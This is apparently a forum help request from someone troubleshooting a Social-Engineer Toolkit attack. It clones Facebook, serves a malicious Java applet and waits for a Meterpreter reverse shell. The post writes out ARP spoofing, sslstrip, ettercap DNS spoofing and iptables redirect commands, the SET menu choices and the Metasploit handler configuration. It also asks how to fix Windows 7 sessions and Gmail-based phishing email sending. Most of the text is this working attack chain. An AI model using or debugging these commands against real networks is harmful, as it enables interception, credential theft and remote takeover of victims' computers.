The attackers IP address is 192.168.1.100. When I enter the ip address (http://192.168.1.100) on the attackers machine the fake website shows up; however, when I enter the ip address (http://192.168.1.100) on my victim laptop and desktop computers, there is no website but a blank page.
I've watched alot of tutorials and they didnt mention needing to ARP the victim computers for the website to appear. However, I tried this approach. So I went ahead and ARPed the victim computers and set up sslstrip with the following commands and the website shows up on my victim machines; however, metasploit does not seem to be listening to the interaction as I have accepted the java applet on my victim machines but there is no notification on the msf console.
These are the commands that brought up the website on the victim comps at the 192.168.1.100 ip address but still did not work with the msfconsole
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
python sslstrip.py -a
arpspoof -i wlan0 -t [victim ip] [Router ip]
ettercap -T -q -i wlan0 -P dns_spoof
Note: I can do the attack completely without ettercap of course, but as soon as I take out sslstrip, the website stops loading again on the victims comp
Here are the settings I've chosen for the website clone
[!] Website Attack Vectors [!]
1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4): 2
1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Method
4. Return to the previous menu
Enter your choice (press enter for default): 1
SET supports both HTTP and HTTPS
Enter the url to clone: Welcome to Facebook
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable Specify a path for your own executable
Enter choice (hit enter for default): 2
For the next option i choose the multiencoder number 15
When it asks for Port to listen on I enter default of 443
msf console opens:Nothing changes after I accept the java applet on my victim comp. This Test worked fine before...My hard drive has crashed since and now I cant duplicate the successful results.
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.1.100
LHOST => 192.168.1.100
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ENCODING x86/countdown
ENCODING => x86/countdown
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:443[*] Starting the payload handler...
msf exploit(handler) >
Conclusion: Website not showing on victims computers until ARP and sslstrip are introduced; however, metasploit does not seem to be able to hear when sslstrip is running. Possible IP table issue? Would appreciate your input...
***Edit: I have fixed the IP tables so that the website appears on the victims machine without ARPing the victims computer and using sslstrip simpy by rebooting. However, still nothing is happening with Metasploit still after I accept the Java applet. Any ideas what I'm leaving out?
Update 2: The test seems to be working flawlessly on windows xp comps. I thought with the latest update that the software said that windows 7 was now vulnerable as well. Perhaps not. Sometimes Randomly the msf will announce it's sending but no sessions are created. Most of the time when I accept the java applet with my windows 7 laptop nothing happens at all.
***Another Engineering Social Toolkit Error I'm encountering is with sendmail which has a history of giving alot of beginners such as myself alot of problems. I've been reading up on it but I ran into the latest error of "Something went wrong, printing the error: (530: '5.7.0 MUST ISSUE A STARTTLS COMMAND FIRST . I am attempting to send with a Gmail account.